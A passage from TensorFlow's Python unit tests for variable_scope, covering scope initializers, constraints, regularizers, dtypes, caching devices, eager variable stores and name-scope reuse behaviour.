with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with variable_scope.variable_scope(tower, initializer=init):
w = variable_scope.get_variable("w", [])
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with variable_scope.variable_scope("tower1") as tower:
with variable_scope.variable_scope("foo", constraint=constraint):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.constraint, constraint)
with variable_scope.variable_scope(tower, constraint=constraint):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.constraint, constraint)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestingError(self):
with variable_scope.variable_scope("aa"):
scope = variable_scope.variable_scope("bb")
scope.__enter__()
with variable_scope.variable_scope("cc"):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
scope.__exit__(None, None, None)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'string:0' shape=() dtype=string>
# has invalid type <class '...ResourceVariable'>, must be a string or Tensor.
# (Can not convert a ResourceVariable into a Tensor or Operation.)
@test_util.run_deprecated_v1
def testStringDefaultInitializer(self):
with self.cached_session():
v = variable_scope.get_variable("string", shape=[], dtype=dtypes.string)
variables_lib.global_variables_initializer().run()
self.assertAllEqual(compat.as_bytes(self.evaluate(v)), b"")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with variable_scope.variable_scope("tower2") as tower:
with variable_scope.variable_scope("foo", dtype=dtypes.float16):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, dtypes.float16)
with variable_scope.variable_scope(tower, dtype=dtypes.float16):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, dtypes.float16)
def testGetVariableInGraphNestedUnderEagerContext(self):
with context.eager_mode():
@function.defun
def f():
v = variable_scope.get_variable("should_be_resource", [])
self.assertEqual(type(v), resource_variable_ops.ResourceVariable)
f()
def testEagerVariableStore(self):
with context.eager_mode():
store = variable_scope.EagerVariableStore()
with store.as_default():
v = variable_scope.get_variable("v", shape=(), trainable=True)
w = variable_scope.get_variable("w", shape=(), trainable=False)
self.assertTrue(v in store.variables())
self.assertTrue(w in store.variables())
self.assertTrue(v in store.trainable_variables())
self.assertFalse(w in store.trainable_variables())
self.assertFalse(v in store.non_trainable_variables())
self.assertTrue(w in store.non_trainable_variables())
# Test copying.
new_store = store.copy()
with new_store.as_default():
new_v = variable_scope.get_variable("v")
new_w = variable_scope.get_variable("w")
self.assertEqual(new_v.numpy(), v.numpy())
self.assertEqual(new_w.numpy(), w.numpy())
self.assertTrue(new_v in new_store.variables())
self.assertTrue(new_w in new_store.variables())
self.assertTrue(new_v in new_store.trainable_variables())
self.assertFalse(new_w in new_store.trainable_variables())
self.assertFalse(new_v in new_store.non_trainable_variables())
self.assertTrue(new_w in new_store.non_trainable_variables())
# Check that variables are separate instances.
for v in store.variables():
v.assign(-1)
for v in new_store.variables():
v.assign(1)
for v in store.variables():
self.assertEqual(v.numpy(), -1)
for v in new_store.variables():
self.assertEqual(v.numpy(), 1)
def testEagerVariableStoreWithEagerDefun(self):
with context.eager_mode():
@function.defun
def f():
x = constant_op.constant([[2.0]])
d1 = core_layers.Dense(
1, name="my_dense", kernel_initializer=init_ops.ones_initializer())
_ = d1(x) # create variables
self.assertEqual(len(d1.variables), 2)
v1, v2 = d1.variables
d2 = core_layers.Dense(
1,
name="my_dense",
kernel_initializer=init_ops.ones_initializer(),
_reuse=True)
_ = d2(x)
self.assertEqual(len(d2.variables), 2)
v3, v4 = d2.variables
self.assertEqual(v1, v3)
self.assertEqual(v2, v4)
f()
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_in_graph_and_eager_modes
def testEagerVariablesStoreAddsToCollections(self):
store = variable_scope.EagerVariableStore()
with store.as_default():
trainable = variable_scope.get_variable("v1", [], trainable=True)
not_trainable = variable_scope.get_variable("v2", [], trainable=False)
concat = variable_scope.get_variable(
"v3", [], collections=[ops.GraphKeys.CONCATENATED_VARIABLES])
self.assertEqual(
ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES),
[trainable, not_trainable])
self.assertEqual(
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES),
[trainable, concat])
self.assertEqual(
ops.get_collection(ops.GraphKeys.CONCATENATED_VARIABLES), [concat])
def testEagerVariablesOutsideStoreNotAddedToCollections(self):
with context.eager_mode():
variable_scope.get_variable("v1", [], trainable=True)
variable_scope.get_variable("v2", [], trainable=False)
self.assertFalse(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
self.assertFalse(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonTensorValue(self):
v = variable_scope.get_variable("v4", initializer=4, dtype=dtypes.int32)
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = variable_scope.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=dtypes.int64)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if context.executing_eagerly() else TypeError
with self.assertRaises(error):
variable_scope.get_variable("x4", initializer={})
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# InvalidArgumentError=: You must feed a value for placeholder tensor
# 'ReadVariableOp/resource' with dtype resource
@test_util.run_in_graph_and_eager_modes
def testInitFromNonInitializer(self):
# Test various dtypes with zeros initializer as following:
types = [
dtypes.int8, dtypes.uint8, dtypes.int16, dtypes.uint16, dtypes.int32,
dtypes.int64, dtypes.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = variable_scope.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = variable_scope.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=init_ops.zeros_initializer(dtype=dtype))
self.evaluate(variables_lib.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# InvalidArgumentError: /job:moo/replica:0/task:0/device:CPU:0 unknown device.
@test_util.run_deprecated_v1
def testVarScopeCachingDevice(self):
with self.cached_session():
caching_device = "/job:moo"
with variable_scope.variable_scope("tower"):
with variable_scope.variable_scope(
"caching", caching_device=caching_device):
v = variable_scope.get_variable("v", [])
self.assertTrue(v.value().device.startswith(caching_device))
with variable_scope.variable_scope("child"):
v2 = variable_scope.get_variable("v", [])
self.assertTrue(v2.value().device.startswith(caching_device))
with variable_scope.variable_scope("not_cached", caching_device=""):
v2_not_cached = variable_scope.get_variable("v", [])
self.assertFalse(
v2_not_cached.value().device.startswith(caching_device))
with variable_scope.variable_scope(
"not_cached_identity_device",
caching_device=lambda op: op.device):
v2_identity_device = variable_scope.get_variable("v", [])
self.assertFalse(
v2_identity_device.value().device.startswith(caching_device))
with variable_scope.variable_scope("we_will_do_it_live") as vs_live:
vs_live.set_caching_device("/job:live")
v_live = variable_scope.get_variable("v", [])
self.assertTrue(v_live.value().device.startswith("/job:live"))
v_tower = variable_scope.get_variable("v", [])
self.assertFalse(v_tower.value().device.startswith(caching_device))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: Tensor.name is meaningless when eager execution is enabled.
@test_util.run_in_graph_and_eager_modes
def testVarScopeRegularizer(self):
init = init_ops.constant_initializer(0.3)
def regularizer1(v):
return math_ops.reduce_mean(v) + 0.1
def regularizer2(v):
return math_ops.reduce_mean(v) + 0.2
with variable_scope.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(1, len(losses))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
with variable_scope.variable_scope(tower, initializer=init) as vs:
u = variable_scope.get_variable("u", [])
vs.set_regularizer(regularizer2)
w = variable_scope.get_variable("w", [])
# Next 3 variable not regularized to test disabling regularization.
x = variable_scope.get_variable(
"x", [], regularizer=variable_scope.no_regularizer)
with variable_scope.variable_scope(
"baz", regularizer=variable_scope.no_regularizer):
y = variable_scope.get_variable("y", [])
vs.set_regularizer(variable_scope.no_regularizer)
z = variable_scope.get_variable("z", [])
# Check results.
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses))
self.evaluate(variables_lib.variables_initializer([u, w, x, y, z]))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
self.assertAllClose(self.evaluate(losses[1]), 0.4)
self.assertAllClose(self.evaluate(losses[2]), 0.5)
with variable_scope.variable_scope("foo", reuse=True):
# reuse=True is for now only supported when eager execution is disabled.
if not context.executing_eagerly():
v = variable_scope.get_variable("v",
[]) # "v" is already there, reused
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses)) # No new loss added.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Tensor-typed variable initializers must either be wrapped in an
# init_scope or callable...
@test_util.run_in_graph_and_eager_modes
def testInitializeFromValue(self):
init = constant_op.constant(0.1)
w = variable_scope.get_variable("v", initializer=init)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegexp(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
variable_scope.get_variable("u", [1], initializer=init)
with variable_scope.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = variable_scope.get_variable("v")
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = constant_op.constant(1, dtype=dtypes.int32)
t = variable_scope.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, dtypes.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegexp(ValueError, "don't match"):
variable_scope.get_variable("s", initializer=init, dtype=dtypes.float64)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'v0:0' shape=(1,) dtype=float32> has
# invalid type <class '...ops.resource_variable_ops.ResourceVariable'>, must
# be a string or Tensor. (Can not convert a ResourceVariable into a Tensor or
# Operation.)
@test_util.run_deprecated_v1
def testControlDeps(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [1], initializer=init_ops.constant_initializer(0))
with ops.control_dependencies([v0.value()]):
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
add = v1 + v0
# v0 should be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(v0)
# We should be able to initialize and run v1 without initializing
# v0, even if the variable was created with a control dep on v0.
self.evaluate(v1.initializer)
self.assertEqual(1, self.evaluate(v1))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(v0)
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(add)
# If we initialize v0 we should be able to run 'add'.
self.evaluate(v0.initializer)
self.evaluate(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AssertionError: True is not false (last assertFalse)
@test_util.run_deprecated_v1
def testEnableResourceVariables(self):
old = variable_scope._DEFAULT_USE_RESOURCE
try:
variable_scope.enable_resource_variables()
self.assertTrue(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
variable_scope.disable_resource_variables()
self.assertFalse(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
finally:
variable_scope._DEFAULT_USE_RESOURCE = old
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument None has invalid type <type 'NoneType'>
@test_util.run_deprecated_v1
def testControlFlow(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [], initializer=init_ops.constant_initializer(0))
var_dict = {}
# Call get_variable in each of the cond clauses.
def var_in_then_clause():
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
var_dict["v1"] = v1
return v1 + v0
def var_in_else_clause():
v2 = variable_scope.get_variable(
"v2", [1], initializer=init_ops.constant_initializer(2))
var_dict["v2"] = v2
return v2 + v0
add = control_flow_ops.cond(
math_ops.less(v0, 10), var_in_then_clause, var_in_else_clause)
v1 = var_dict["v1"]
v2 = var_dict["v2"]
# We should be able to initialize and run v1 and v2 without initializing
# v0, even if the variable was created with a control dep on v0.
self.evaluate(v1.initializer)
self.assertEqual([1], self.evaluate(v1))
self.evaluate(v2.initializer)
self.assertEqual([2], self.evaluate(v2))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(v0)
# We should not be able to run 'add' yet.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(add)
# If we initialize v0 we should be able to run 'add'.
self.evaluate(v0.initializer)
self.evaluate(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'.
@test_util.run_in_graph_and_eager_modes
def testGetVariableScope(self):
# Test the get_variable_scope() function and setting properties of result.
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("bar"):
new_init1 = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init1, None)
# Check that we can set initializer like this.
variable_scope.get_variable_scope().set_initializer(init)
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
if not context.executing_eagerly():
# Check that we can set reuse.
variable_scope.get_variable_scope().reuse_variables()
with self.assertRaises(ValueError): # Fail, w does not exist yet.
variable_scope.get_variable("w", [1])
# Check that the set initializer goes away.
new_init = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init, None)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScope(self):
with variable_scope.variable_scope("tower4") as tower:
self.assertEqual(tower.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower4/scope/")
with variable_scope.variable_scope("tower5"):
with variable_scope.variable_scope("bar") as bar:
self.assertEqual(bar.name, "tower5/bar")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower5/bar/scope/")
with variable_scope.variable_scope("tower6"):
with variable_scope.variable_scope(tower, reuse=True) as tower_shared:
self.assertEqual(tower_shared.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower6/tower4/scope/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNameScope(self):
with ops.name_scope("testVarScopeNameScope1"):
with variable_scope.variable_scope("tower") as tower:
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(
tower): # Re-entering acts like another "tower".
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_1/scope2/")
with variable_scope.variable_scope(
"tower"): # Re-entering by string acts the same.
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_2/scope2/")
with ops.name_scope("testVarScopeNameScope2"):
with variable_scope.variable_scope("tower"):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(tower):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower_1/scope2/")
root_var_scope = variable_scope.get_variable_scope()
with ops.name_scope("testVarScopeNameScope3"):
with variable_scope.variable_scope(root_var_scope):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope3/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOriginalNameScope(self):
with self.cached_session():
with ops.name_scope("scope1"):
with variable_scope.variable_scope("tower") as tower:
self.assertEqual(tower.original_name_scope, "scope1/tower/")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "scope1/tower/scope2/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower) as tower1:
# Re-entering preserves original name scope.
self.assertEqual(tower1.original_name_scope, "scope1/tower/")
with ops.name_scope("foo") as sc2:
self.assertEqual(sc2, "scope2/tower/foo/")
# Test re-entering original name scope.
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower):
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar_1/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeObjectReuse(self):
with self.cached_session():
vs = None
with variable_scope.variable_scope("jump", reuse=True) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertTrue(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertTrue(jump_no_reuse.reuse) # Inherited, cannot be undone.
with variable_scope.variable_scope("jump", reuse=False) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertFalse(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertFalse(jump_no_reuse.reuse)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = constant_op.constant(value)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = state_ops.assign(variable_scope.get_variable("var", []), x)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = variable_scope.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with ops.name_scope("testVarOpScope1"):
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "tower/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower/testVarOpScope2/")
with variable_scope.variable_scope("tower", "default", []):
with self.assertRaises(ValueError):
variable_scope.get_variable("w", [])
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower_1/testVarOpScope2/")
with ops.name_scope("testVarOpScope2"):
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default/testVarOpScope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default_1/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default_1/testVarOpScope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with variable_scope.variable_scope("default") as default:
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer/w:0")
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_1/w:0")
with variable_scope.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True) as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with variable_scope.variable_scope("root"):
with variable_scope.variable_scope("towerA") as tower_a:
va = variable_scope.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("towerB"):
vb = variable_scope.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with self.assertRaises(ValueError):
with variable_scope.variable_scope("towerA"):
va2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("towerA", reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("foo"):
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va3 = variable_scope.get_variable("v", [1])
self.assertEqual(va, va3)
with self.assertRaises(ValueError):
with variable_scope.variable_scope(tower_a, reuse=True):
with variable_scope.variable_scope("baz"):
variable_scope.get_variable("v", [1])
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [1], dtype=dtypes.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer_1/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default_1/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer) as outer:
with variable_scope.variable_scope("tower", "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with variable_scope.variable_scope(None, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "scope/w:0")
